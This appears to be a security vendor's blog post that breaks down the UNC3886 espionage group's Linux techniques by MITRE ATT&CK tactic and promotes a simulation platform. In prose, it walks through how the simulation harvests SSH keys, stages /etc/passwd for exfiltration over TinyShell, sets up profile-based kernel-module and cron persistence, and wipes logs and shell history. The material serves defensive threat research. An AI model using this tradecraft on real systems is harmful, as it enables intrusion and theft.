UNC3886 Tactics, Techniques, and Procedures: Full Technical Breakdown

UNC3886 is a China-linked cyber espionage group targeting critical infrastructure in Asia, Europe, and North America. In 2025, Singapore formally attributed attacks to the group, highlighting its focus on sectors like energy, telecom, healthcare, and transportation.

Known for exploiting zero-days in Fortinet, VMware, and Juniper systems, UNC3886 deploys rootkits, maintains persistence, and evades detection using encrypted channels, renamed utilities, and non-standard protocols.

This blog maps UNC3886’s behaviors to MITRE ATT&CK and shows how the Picus Platform simulates these techniques to expose detection gaps and validate control effectiveness against advanced persistent threats.

(Note that this analysis is based solely on Linux endpoint malware samples used by UNC3886; however, the Picus Platform also delivers multiple methods for network and email infiltration attacks.)

UNC3886: Overview and Key Findings

The group is known for exploiting zero-days in Fortinet, VMware, and Juniper systems to deploy rootkits and maintain stealthy persistence.

• Initial access via Fortinet and VMware zero-day vulnerabilities

• Persistence using TinyShell, REPTILE, and kernel-level rootkits

• Command and Control through encrypted channels and non-standard ports

• Target focus: strategic infrastructure and unmonitored environments (e.g., hypervisors, routers)

• Ongoing campaigns observed in 2025, including overlaps with the “Fire Ant” espionage operation

UNC3886 exemplifies a long-term, stealth-oriented APT operation requiring multi-layered detection and validation strategies.

Defense Evasion (ATT&CK TA0005)

Renaming Legitimate Utilities (MITRE T1036.003)

This technique allows adversaries to evade detection by renaming legitimate system utilities, making malicious activity appear as normal system operations. 

By substituting a well-known utility (like cat) with a benign-sounding name (like ifconfig), attackers can avoid triggering security alerts.

How Does Picus Simulate This Behavior?

This command copies the legitimate cat utility, renaming it to ifconfig. This step allows the attacker to use a familiar system tool under a different name to avoid detection.

The renamed ifconfig utility is then executed, which in this case, functions as cat to read sensitive files like /etc/passwd, effectively hiding the malicious activity by using a common utility name.

Hiding Artifacts (MITRE T1564)

Attackers use this technique to manipulate file timestamps, making it harder for security systems to detect malicious activity. By changing the creation or modification time of files, adversaries can make their artifacts appear legitimate or older, evading monitoring tools.

How Does Picus Simulate This Behavior?

This step makes the custom ELF binary (changefiletime.elf) executable. The binary is specifically crafted to alter file timestamps, a technique used by attackers to evade detection and make malicious files appear benign or older than they actually are.

The executable is invoked to modify the timestamp of the dummy.elf file. This simulates how an attacker alters file metadata, typically to conceal the presence of malicious files or tools by adjusting creation and modification times, thereby avoiding detection by security systems.

This command checks and outputs the modified timestamp of the dummy.elf file. By displaying the altered timestamp, it confirms that the file's metadata has been successfully manipulated, allowing the attacker to bypass timestamp-based detection systems.

Discovery (ATT&CK TA0007)

Use of Non-Application Layer Protocol (MITRE T1095)

Adversaries use this technique to gather system information via non-application layer protocols, bypassing traditional application-layer detection mechanisms. UNC3886 employs Melofee malware to perform stealthy system reconnaissance without triggering common defenses.

How Does Picus Simulate This Behavior?

Command 1: Runs the Melofee client, establishing a connection to the implant and initiating a non-application layer protocol for system reconnaissance. This simulates the use of stealthy communication channels to evade detection by traditional application-layer defenses.

Command 2: The implant is executed, enabling the malware to gather system information. It acts as a covert data collection tool that bypasses conventional application-layer monitoring by using non-standard communication protocols.

Command 3: This final command retrieves system information collected by the Melofee implant. By using non-application layer protocols, the implant can quietly gather sensitive data without triggering defenses that rely on application-layer traffic inspection.

Credential Access (ATT&CK TA0006)

Private Keys (MITRE T1552.004)

This technique involves adversaries acquiring SSH private keys, which are often used for authentication to remote systems. By accessing these private keys, attackers can bypass traditional authentication mechanisms and gain unauthorized access to systems. 

UNC3886 uses this method to gather SSH private keys to escalate privileges or establish persistent access to targeted systems without detection.

How Does Picus Simulate This Behavior?

Command 1: Scans the SSH directory (~/.ssh/) for private keys by searching for the PRIVATE keyword, which is typically found in SSH key files. It simulates an attacker searching for private keys stored on the compromised system.

Command 2: Reads the known_hosts file, which stores the SSH fingerprints of previously connected servers. While not directly a private key, attackers may use this information to identify potential targets or maintain access to remote systems, aiding their broader credential access strategy

Command 3: Lists the contents of the ~/.ssh/ directory, allowing the attacker to view all stored SSH keys, including private and public keys, further aiding in the discovery and exfiltration of critical authentication credentials.

Command and Control (ATT&CK TA0011)

Ingress Tool Transfer (MITRE T1105)

This technique involves adversaries transferring a malicious client or tool to the target system to establish command-and-control (C2) communication. UNC3886 uses the Ingress Tool Transfer technique to upload the TinyShell malware client, which allows the attacker to remotely control the system and send or receive commands. This process helps establish persistent, covert communication with the compromised host.

How Does Picus Simulate This Behavior?

Command 1: Uses curl to download the TinyShell malware client from a remote server. The client is saved to the working directory ($WORKDIR), simulating how an attacker retrieves a malicious tool disguised as a legitimate file (using a fake user-agent header) for command-and-control communication.

Command 2: Lists the files in the $WORKDIR directory, allowing the attacker to confirm that the TinyShell client has been successfully downloaded and is available for execution. This step ensures the malware client is present and ready to initiate the C2 communication.

Non-Standard Port (MITRE T1571)

This technique involves using non-standard ports to establish encrypted command-and-control (C2) communication, helping adversaries bypass network defenses that focus on known ports. 

UNC3886 uses the TinyShell malware to listen on a non-standard port (1234) for C2 communication, making detection more difficult as it avoids conventional monitoring and filtering.

How Does Picus Simulate This Behavior?

Command 1: Starts the TinyShell listener on a non-standard port (1234) with an encrypted password (PicusPicusPicus). It simulates how an attacker establishes a covert, encrypted C2 listener to receive commands from a remote system while avoiding detection by security devices monitoring common ports.

Command 2: Checks if the TinyShell listener is active and listening on the non-standard port (1234). By confirming the listener's presence, it simulates the attacker's verification step to ensure the encrypted C2 communication channel is properly set up and ready for interaction.

Execution (ATT&CK TA0002)

Inter-Process Communication (MITRE T1559)

This technique leverages inter-process communication (IPC) mechanisms to send and execute commands over encrypted channels, helping adversaries maintain covert communication and control. 

UNC3886 uses TinyShell malware to execute commands from a remote, encrypted channel, facilitating communication between compromised systems and attackers while avoiding detection.

How Does Picus Simulate This Behavior?

Command 1: Already explained previously.

Command 2: Uses the TinyShell client to send the command uname -a over the established encrypted channel to the host at 127.0.0.1. It simulates executing a system command (uname -a) remotely via the encrypted IPC channel, enabling the attacker to retrieve system information while avoiding detection by traditional monitoring systems.

Exfiltration (ATT&CK TA0010)

Exfiltration Over C2 Channel (MITRE T1041)

This technique involves adversaries exfiltrating data over a command-and-control (C2) channel, often using encrypted communication to avoid detection by security systems. UNC3886 uses TinyShell malware to exfiltrate sensitive files through an encrypted C2 channel, bypassing traditional data loss prevention tools.

How Does Picus Simulate This Behavior?

Command 1: Starts the TinyShell malware listener on a non-standard port (1234) with an encrypted password (PicusPicusPicus). It simulates setting up a secure C2 communication channel that will be used to send and receive files from the compromised system.

Command 2: Exports the contents of the /etc/passwd file into a text file (/tmp/exfil_test.txt). This simulates an attacker selecting sensitive system data (e.g., user credentials) for exfiltration.

Command 3: The TinyShell client is used to request the exfiltration of the file (/tmp/exfil_test.txt) over the encrypted C2 channel. This simulates an attacker sending a file request via the C2 channel and receiving the exfiltrated file from the compromised system.

Command 4: Verifies that the file was successfully exfiltrated by displaying its contents from the TinyShell working directory. It confirms that the exfiltrated data (in this case, system credentials) has been successfully transferred to the attacker's controlled environment.

Persistence (ATT&CK TA0003)

Kernel Modules and Extensions (MITRE T1547.006)

This technique involves adversaries loading malicious kernel modules to maintain persistence on a compromised system. By placing a malicious module in the system, attackers ensure that it is executed each time the system reboots, providing a persistent foothold. 

UNC3886 uses this technique to load a custom kernel module (intel_audio.ko) and ensures it remains active by adding commands to system configuration files.

How Does Picus Simulate This Behavior?

Command 1: Creates a random file (intel_audio.ko) in /tmp/ using the dd utility, simulating the creation of a malicious kernel module. The file is filled with random data, which may later be used to hide the actual malicious content.

Command 2: Appends the insmod command (to insert the kernel module) to the .bash_profile, ensuring that the malicious kernel module is loaded every time the user starts a new session in the terminal, establishing persistence.

Command 3: Similar to the previous step, this command appends the insmod command to the .bash_login file, which is executed when the user logs in, further ensuring that the malicious module is loaded on each login.

Command 4: This command appends the same insmod command to the .profile file, which is executed for login shells, thereby ensuring that the malicious kernel module is loaded on every user login, reinforcing persistence.

Command 5: Reads and displays the contents of the configuration files, confirming that the malicious insmod command has been successfully inserted into multiple files, thus ensuring that the kernel module will be loaded each time the system is accessed.

Through these commands, Picus demonstrates how UNC3886 uses the persistence technique of kernel modules by embedding commands into system configuration files, allowing the malicious module to load automatically upon user login or session start, thus maintaining a foothold on the system.

Cron (MITRE T1053.003)

This technique involves adversaries using cron jobs to maintain persistence on a compromised system. By adding malicious commands to the system’s scheduled tasks, attackers can ensure their payload is executed at regular intervals. 

UNC3886 uses cron jobs to repeatedly execute a command, maintaining access to the system.

How Does Picus Simulate This Behavior?

Command 1: This command adds a new cron job to the user's crontab that runs every 5 minutes. It appends a simple command (echo This could be really dangerous to run), which simulates inserting a malicious task into the scheduled jobs, potentially running harmful or unauthorized actions at regular intervals.

Command 2: This command lists the user's cron jobs and filters the output to check for the newly added job. It ensures that the malicious cron task has been successfully inserted into the system, confirming persistence by checking the contents of the crontab.

Impact (ATT&CK TA0005)

Clear Linux or Mac System Logs (MITRE T1070.002)

How Does Picus Simulate This Behavior?

This technique involves adversaries clearing or tampering with system logs to hide their tracks and evade detection. By deleting or altering log files, attackers make it more difficult for security monitoring systems to identify their presence or actions. Picus simulates this technique to demonstrate how adversaries may manipulate system logs to maintain stealth.

Command 1: Deletes key log files, such as lastlog, wtmp, secure, and messages, which store critical information about user activities, system events, and authentication. By removing these logs, it simulates how an attacker might erase traces of their actions from the system to evade detection.

Command 2: Clears the shell history and disables history file saving, preventing the system from logging executed commands. The HISTFILE is redirected to /dev/null, effectively discarding any saved command history and ensuring no record of malicious activity is left in the shell history.

Command 3: Creates empty or zero-byte versions of the deleted log files. By touching these files, the attacker ensures that the log files are present, but without any records of previous activities. This further simulates tampering with logs to remove evidence of intrusion while maintaining the appearance of a normal system state.

How Picus Helps Defend Against UNC3886 Attacks?

The Picus Security Validation Platform safely simulates UNC3886’s techniques using its continuously updated Threat Library, identifying blind spots across EDRs, NGFWs, and SIEMs before attackers can exploit them. 

You can also test your defenses against hundreds of other ransomware variants, such as Medusa, Rhysida, and Black Basta, within minutes with a 14-day free trial of the Picus Platform.